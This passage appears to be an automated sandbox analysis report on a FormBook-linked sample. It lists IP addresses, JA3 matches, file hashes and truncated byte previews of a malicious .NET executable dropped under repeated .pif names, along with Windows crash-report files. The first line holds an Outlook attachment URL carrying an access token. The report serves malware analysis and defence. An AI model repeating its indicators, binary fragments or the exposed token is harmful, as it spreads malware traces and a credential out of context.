                                                    https://attachments.office.net/owa/ventaran%40uhnj.org/service.svc/s/GetAttachmentThumbnail?id=AAMkAGIxZGRmNDIyLTdlYjktNGE0Mi1iYzllLWJjNDkzMTc2Yzk2MgBGAAAAAABpXyVcvLtYQacD%2F70nLLtKBwDrjZcSYCXyS71g8CDdCeL5AAAAAAEMAADrjZcSYCXyS71g8CDdCeL5AALMSNinAAABEgAQAADe12fCEQJKlqdTgojHV%2F4%3D&thumbnailType=2&token=eyJhbGciOiJSUzI1NiIsImtpZCI6IkU1RDJGMEY4REE5M0I2NzA5QzQzQTlFOEE2MTQzQzAzRDYyRjlBODAiLCJ0eXAiOiJKV1QiLCJ4NXQiOiI1ZEx3LU5xVHRuQ2NRNm5vcGhROEE5WXZtb0EifQ.eyJvcmlnaW4iOiJodHRwczovL291dGxvb2sub2ZmaWNlLmNvbSIsInVjIjoiNDRlZjE3MDU4YjU1NGY3NDkxMWZkNzY5YTQ2NjQzMzMiLCJ2ZXIiOiJFeGNoYW5nZS5DYWxsYmFjay5WMSIsImFwcGN0eHNlbmRlciI6Ik93YURvd25sb2FkQGMwY2JkYjBlLTMxMjYtNGYwMC1hNDJlLTVhMWMxMTM3YjE0NSIsImlzc3JpbmciOiJXVyIsImFwcGN0eCI6IntcIm1zZXhjaHByb3RcIjpcIm93YVwiLFwicHVpZFwiOlwiMTE1MzgwMTExOTkxNjU1ODQyM1wiLFwic2NvcGVcIjpcIk93YURvd25sb2FkXCIsXCJvaWRcIjpcImMwODBmODc2LWYyZGYtNGU3My05YjVmLWVmYjAwYTAwMjVkMlwiLFwicHJpbWFyeXNpZFwiOlwiUy0xLTUtMjEtOTM1NDE3ODU0LTE1MzIzMjc5NzgtNjk1NzQxMzkyLTM0MDQyNTU0XCJ9IiwibmJmIjoxNzIxNzMzNTk3LCJleHAiOjE3MjE3MzM4OTcsImlzcyI6IjAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMEBjMGNiZGIwZS0zMTI2LTRmMDAtYTQyZS01YTFjMTEzN2IxNDUiLCJhdWQiOiIwMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAvYXR0YWNobWVudHMub2ZmaWNlLm5ldEBjMGNiZGIwZS0zMTI2LTRmMDAtYTQyZS01YTFjMTEzN2IxNDUiLCJoYXBwIjoib3dhIn0.Cq9zZ4wXEnEImzWzyBZYp-d2fbKkLCKgvaHlzyRLGEX-WF0KYoHknMeXmIIM_lXwUCwzZlu2YAm5O3YcCr_146uPjHK-rYPF1GyNdX2sHq2yRl1brijFF9LQmRDIiJpeEV1ZhPQ7aGeAuPvO2eVJzwHZ5OQ439ksu0NvvbEbxVBnjBoVD9O6_mtGZatpAqZ9iPuit9dCEdh1InWQsomtJAlznu2AvofNzibml6QW2zAUWYjGSLlYKiFOS9JIL_erW-g-Rpvdov52FRsnrrL4Og9fnMU88AkASJ-Ww_T6FonnXkMD04WalXx_RTFaK8Lia6_gI8tqUne26xyecuVUsw&X-OWA-CANARY=bdvoVzl2WAQAAAAAAAAAAKCbdWIJq9wY3zSkkZkqX53m_RWl5bhgJDlRyu3H1AX0WGscFJF0Wf0.&owa=outlook.office.com&scriptVer=20240712002.10&clientId=40140A3AF9B84833B3104D69DCC4371C&animation=trueGet hashmaliciousUnknownBrowse
                                                    • 40.99.150.66
                                                    Fzfee1Lgc2.elfGet hashmaliciousUnknownBrowse
                                                    • 104.211.74.75
                                                    gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                    • 20.110.232.160
                                                    bJrO2iUerN.elfGet hashmaliciousUnknownBrowse
                                                    • 65.52.70.163
                                                    2NyX8R4CZo.exeGet hashmaliciousRemcosBrowse
                                                    • 13.107.246.60
                                                    ZAHER.xlsGet hashmaliciousUnknownBrowse
                                                    • 13.107.246.42
                                                    bCf3oao8Yl.exeGet hashmaliciousBabadedaBrowse
                                                    • 94.245.104.56
                                                    Transfer copy.lnkGet hashmaliciousFormBookBrowse
                                                    • 13.107.137.11

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0ekHeNppYRgN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 13.107.139.11
                                                    • 13.107.137.11
                                                    QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 13.107.139.11
                                                    • 13.107.137.11
                                                    QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 13.107.139.11
                                                    • 13.107.137.11
                                                    QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 13.107.139.11
                                                    • 13.107.137.11
                                                    QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 13.107.139.11
                                                    • 13.107.137.11
                                                    QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 13.107.139.11
                                                    • 13.107.137.11
                                                    QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 13.107.139.11
                                                    • 13.107.137.11
                                                    QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 13.107.139.11
                                                    • 13.107.137.11
                                                    QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 13.107.139.11
                                                    • 13.107.137.11
                                                    QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 13.107.139.11
                                                    • 13.107.137.11

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifTransfer copy.lnkGet hashmaliciousFormBookBrowse
                                                      C:\Users\user\Documents\4Ear91jgQ7.pifTransfer copy.lnkGet hashmaliciousFormBookBrowse
                                                        C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifTransfer copy.lnkGet hashmaliciousFormBookBrowse
                                                          C:\Users\user\Documents\4Ear91jgQ7.pif.pifTransfer copy.lnkGet hashmaliciousFormBookBrowse

                                                            Created / dropped Files

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_4Ear91jgQ7.pif.p_74f41cce510af5c4e782d7fae19528785ee3a3_156dd5ae_b0381c27-7b4f-4fdc-bd39-cbe1816b3f8e\Report.wer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):1.2517729157762465
                                                            Encrypted:false
                                                            SSDEEP:192:/8qCBOUeJ/0BU/KaGyFo5eZezuiFqZ24IO8un:kqCBOUeCBU/KaVkmezuiFqY4IO8un
                                                            MD5:1AF6A980203E635CE8A986A458B03A51
                                                            SHA1:879D5127425B07401348ED3955FB5469B846088D
                                                            SHA-256:6505BBE264EDE7492D3EC6D9B77366F15C099C8E0CA4B0A855ADF49E7941D24C
                                                            SHA-512:E227A0549D9328B31CE39CAA1E45058B967A3A8F9BCA48088FEDF302507BFF61B7DC92118F4CC18FCF1F9623C1A75AAE6C166EDEFDF4850AAC9823A4D937192B
                                                            Malicious:false
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.2.1.2.6.4.7.7.4.2.1.4.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.2.1.2.6.4.9.0.7.0.2.6.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.3.8.1.c.2.7.-.7.b.4.f.-.4.f.d.c.-.b.d.3.9.-.c.b.e.1.8.1.6.b.3.f.8.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.b.7.a.6.2.7.-.1.6.c.c.-.4.d.c.d.-.9.9.6.a.-.f.d.2.a.7.d.8.2.2.c.7.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.E.a.r.9.1.j.g.Q.7...p.i.f...p.i.f...p.i.f...p.i.f.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.l.a.n.i.a.b.d.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.c.-.0.0.0.1.-.0.0.1.4.-.c.9.f.d.-.5.3.e.d.f.e.d.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.c.c.4.b.c.0.5.e.a.6.2.1.b.f.d.9.3.f.a.c.7.6.1.1.8.f.a.3.4.4.2.0.0.0.0.0.0.0.0.!.0.0.0.0.0.2.5.9.6.0.9.e.d.1.e.c.6.4.9.f.7.9.7.8.6.9.c.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER131.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8480
                                                            Entropy (8bit):3.709985755180127
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJVg6OZ6YEIPSU1gmfZRppr189bqMsf1Jum:R6lXJy6A6YEQSU1gmf/Wqff15
                                                            MD5:E97D1F639E8752A72D9193F59B3E032E
                                                            SHA1:C0CEDD61FEF9C8C645E663FECEF1CAA1428CDE47
                                                            SHA-256:20413D9968117A025FF156EE877865EEEEF4AB54818BD8CF9031BD765A606262
                                                            SHA-512:120D9C5A230821967070695223D917D42561092E8CCED228F2583F359E8B5B5A28FD9701833DD6322DF3D95598B7C9EA84365F5C4251FE38D24E08D46C5A7762
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.7.6.<./.P.i.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER170.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4830
                                                            Entropy (8bit):4.531308747671525
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zs4tJg77aI9SkMnWpW8VY6Ym8M4JXTFo+q8vMFs/Ju4d:uIjf4HI7xMW7VCJeKWku4d
                                                            MD5:DEE49FF13DB6021E9E4D516968860452
                                                            SHA1:D4B9007E3871D07F79343BD2909AD3B1ECC1D4DD
                                                            SHA-256:7179B34E3CA48E6CE69C621B910C631E5D476BC9ED77B9178D53ED493D018E6C
                                                            SHA-512:D578F363A353EC05599926A892A328453743810DEBD115149EF0217B21AF3F8F7832A6C32980030F8A173C70E7C712B2E73B7C10E4D7120767D355B52BAA7A96
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="423593" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE22.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 15 streams, Tue Jul 23 12:50:48 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):364841
                                                            Entropy (8bit):3.817374398771899
                                                            Encrypted:false
                                                            SSDEEP:3072:cqbjwHaFnVi7DGO4uEqOPywLTgiqYVFi+VuR2V5v7:c9CnVrO4hPyWTgi/VFiiuRYv
                                                            MD5:6D548275A68D62AAFEFAFBB1F8AFD07E
                                                            SHA1:8CC753A99D30518A45143363CDE1749981E608AE
                                                            SHA-256:BA00EEACA8E30BB55A0C07AEABBA084C7DB83C2F98F21F072D69B53F8DA55400
                                                            SHA-512:95E821B78829BF11F6BFCC1A2E3DD9037661490EC25AA866CA35FE87EAFD6893C12C0CA180E5EC6F24EB76E4C2E29A4EEA8AE37A566D7195EB4DBAB346260C83
                                                            Malicious:false
                                                            Preview:MDMP..a..... .......(..f.........................#..........<... -......$6...i..........`.......8...........T............]...3..........\-..........H/..............................................................................eJ......./......GenuineIntel............T.......L..."..f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\H0840I45

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\findstr.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\Documents\4Ear91jgQ7.pif

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):6.459218145787354
                                                            Encrypted:false
                                                            SSDEEP:384:dHjYE/8qnRY1yoY4CTj0MiKSFp9paTqjkSdKrA+5WmC9NAkYIbdkK8oy10jq4ryj:ZEi7/iKSBpaPL0XY0jSSfOf876sNfpE
                                                            MD5:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            SHA1:0259609ED1EC649F797869CA14A7AEF9F2029FFB
                                                            SHA-256:9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
                                                            SHA-512:2F2347BF1FFFE021DEAAE8A77695026498D8D9C8E715ED991CDAA4086C4DF9196D4592855947912C27B7BB56F1567F92FE1CFAF324D2D41291618009B26FB487
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                            Joe Sandbox View:
                                                            • Filename: Transfer copy.lnk, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0..V...........t... ........@.. ....................................@..................................t..W.......h(...........................u............................................... ............... ..H............text....U... ...V.................. ..`.rsrc...h(.......*...X..............@..@.reloc..............................@..B.................t......H........6...=......-....s..............................................u.U.\.....NC...#_..8..._..;.....8?W.)..p..X.;/r..7........hkg_....f...p"S.-..01...s.{.d...I.\....B.0..........+.....E....;.......o........~8... ....(C.......+............}'...~8... ....(C.......+....}(.....~....})....+..+.,.~8... ....(C.......8x......}*.....~8... ....(C.......8V.....~9.........(H...}&...~:....{&...(M....~;...........(R......(.........*.0..........~....(....&*Vr...p(<...s........

                                                            C:\Users\user\Documents\4Ear91jgQ7.pif.pif

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):6.459218145787354
                                                            Encrypted:false
                                                            SSDEEP:384:dHjYE/8qnRY1yoY4CTj0MiKSFp9paTqjkSdKrA+5WmC9NAkYIbdkK8oy10jq4ryj:ZEi7/iKSBpaPL0XY0jSSfOf876sNfpE
                                                            MD5:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            SHA1:0259609ED1EC649F797869CA14A7AEF9F2029FFB
                                                            SHA-256:9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
                                                            SHA-512:2F2347BF1FFFE021DEAAE8A77695026498D8D9C8E715ED991CDAA4086C4DF9196D4592855947912C27B7BB56F1567F92FE1CFAF324D2D41291618009B26FB487
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                            Joe Sandbox View:
                                                            • Filename: Transfer copy.lnk, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0..V...........t... ........@.. ....................................@..................................t..W.......h(...........................u............................................... ............... ..H............text....U... ...V.................. ..`.rsrc...h(.......*...X..............@..@.reloc..............................@..B.................t......H........6...=......-....s..............................................u.U.\.....NC...#_..8..._..;.....8?W.)..p..X.;/r..7........hkg_....f...p"S.-..01...s.{.d...I.\....B.0..........+.....E....;.......o........~8... ....(C.......+............}'...~8... ....(C.......+....}(.....~....})....+..+.,.~8... ....(C.......8x......}*.....~8... ....(C.......8V.....~9.........(H...}&...~:....{&...(M....~;...........(R......(.........*.0..........~....(....&*Vr...p(<...s........

                                                            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):6.459218145787354
                                                            Encrypted:false
                                                            SSDEEP:384:dHjYE/8qnRY1yoY4CTj0MiKSFp9paTqjkSdKrA+5WmC9NAkYIbdkK8oy10jq4ryj:ZEi7/iKSBpaPL0XY0jSSfOf876sNfpE
                                                            MD5:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            SHA1:0259609ED1EC649F797869CA14A7AEF9F2029FFB
                                                            SHA-256:9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
                                                            SHA-512:2F2347BF1FFFE021DEAAE8A77695026498D8D9C8E715ED991CDAA4086C4DF9196D4592855947912C27B7BB56F1567F92FE1CFAF324D2D41291618009B26FB487
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                            Joe Sandbox View:
                                                            • Filename: Transfer copy.lnk, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0..V...........t... ........@.. ....................................@..................................t..W.......h(...........................u............................................... ............... ..H............text....U... ...V.................. ..`.rsrc...h(.......*...X..............@..@.reloc..............................@..B.................t......H........6...=......-....s..............................................u.U.\.....NC...#_..8..._..;.....8?W.)..p..X.;/r..7........hkg_....f...p"S.-..01...s.{.d...I.\....B.0..........+.....E....;.......o........~8... ....(C.......+............}'...~8... ....(C.......+....}(.....~....})....+..+.,.~8... ....(C.......8x......}*.....~8... ....(C.......8V.....~9.........(H...}&...~:....{&...(M....~;...........(R......(.........*.0..........~....(....&*Vr...p(<...s........

                                                            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):6.459218145787354
                                                            Encrypted:false
                                                            SSDEEP:384:dHjYE/8qnRY1yoY4CTj0MiKSFp9paTqjkSdKrA+5WmC9NAkYIbdkK8oy10jq4ryj:ZEi7/iKSBpaPL0XY0jSSfOf876sNfpE
                                                            MD5:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            SHA1:0259609ED1EC649F797869CA14A7AEF9F2029FFB
                                                            SHA-256:9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
                                                            SHA-512:2F2347BF1FFFE021DEAAE8A77695026498D8D9C8E715ED991CDAA4086C4DF9196D4592855947912C27B7BB56F1567F92FE1CFAF324D2D41291618009B26FB487
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                            Joe Sandbox View:
                                                            • Filename: Transfer copy.lnk, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0..V...........t... ........@.. ....................................@..................................t..W.......h(...........................u............................................... ............... ..H............text....U... ...V.................. ..`.rsrc...h(.......*...X..............@..@.reloc..............................@..B.................t......H........6...=......-....s..............................................u.U.\.....NC...#_..8..._..;.....8?W.)..p..X.;/r..7........hkg_....f...p"S.-..01...s.{.d...I.\....B.0..........+.....E....;.......o........~8... ....(C.......+............}'...~8... ....(C.......+....}(.....~....})....+..+.,.~8... ....(C.......8x......}*.....~8... ....(C.......8V.....~9.........(H...}&...~:....{&...(M....~;...........(R......(.........*.0..........~....(....&*Vr...p(<...s........

                                                            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):6.459218145787354
                                                            Encrypted:false
                                                            SSDEEP:384:dHjYE/8qnRY1yoY4CTj0MiKSFp9paTqjkSdKrA+5WmC9NAkYIbdkK8oy10jq4ryj:ZEi7/iKSBpaPL0XY0jSSfOf876sNfpE
                                                            MD5:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            SHA1:0259609ED1EC649F797869CA14A7AEF9F2029FFB
                                                            SHA-256:9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
                                                            SHA-512:2F2347BF1FFFE021DEAAE8A77695026498D8D9C8E715ED991CDAA4086C4DF9196D4592855947912C27B7BB56F1567F92FE1CFAF324D2D41291618009B26FB487
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0..V...........t... ........@.. ....................................@..................................t..W.......h(...........................u............................................... ............... ..H............text....U... ...V.................. ..`.rsrc...h(.......*...X..............@..@.reloc..............................@..B.................t......H........6...=......-....s..............................................u.U.\.....NC...#_..8..._..;.....8?W.)..p..X.;/r..7........hkg_....f...p"S.-..01...s.{.d...I.\....B.0..........+.....E....;.......o........~8... ....(C.......+............}'...~8... ....(C.......+....}(.....~....})....+..+.,.~8... ....(C.......8x......}*.....~8... ....(C.......8V.....~9.........(H...}&...~:....{&...(M....~;...........(R......(.........*.0..........~....(....&*Vr...p(<...s........

                                                            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):6.459218145787354
                                                            Encrypted:false
                                                            SSDEEP:384:dHjYE/8qnRY1yoY4CTj0MiKSFp9paTqjkSdKrA+5WmC9NAkYIbdkK8oy10jq4ryj:ZEi7/iKSBpaPL0XY0jSSfOf876sNfpE
                                                            MD5:DCF2CEB7FAA5754E5FB0B7DB1CC23637
                                                            SHA1:0259609ED1EC649F797869CA14A7AEF9F2029FFB
                                                            SHA-256:9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
                                                            SHA-512:2F2347BF1FFFE021DEAAE8A77695026498D8D9C8E715ED991CDAA4086C4DF9196D4592855947912C27B7BB56F1567F92FE1CFAF324D2D41291618009B26FB487
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0..V...........t... ........@.. ....................................@..................................t..W.......h(...........................u............................................... ............... ..H............text....U... ...V.................. ..`.rsrc...h(.......*...X..............@..@.reloc..............................@..B.................t......H........6...=......-....s..............................................u.U.\.....NC...#_..8..._..;.....8?W.)..p..X.;/r..7........hkg_....f...p"S.-..01...s.{.d...I.\....B.0..........+.....E....;.......o........~8... ....(C.......+............}'...~8... ....(C.......+....}(.....~....})....+..+.,.~8... ....(C.......8x......}*.....~8... ....(C.......8V.....~9.........(H...}&...~:....{&...(M....~;...........(R......(.........*.0..........~....(....&*Vr...p(<...s........

                                                            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif:Zone.Identifier

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif:Zone.Identifier

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

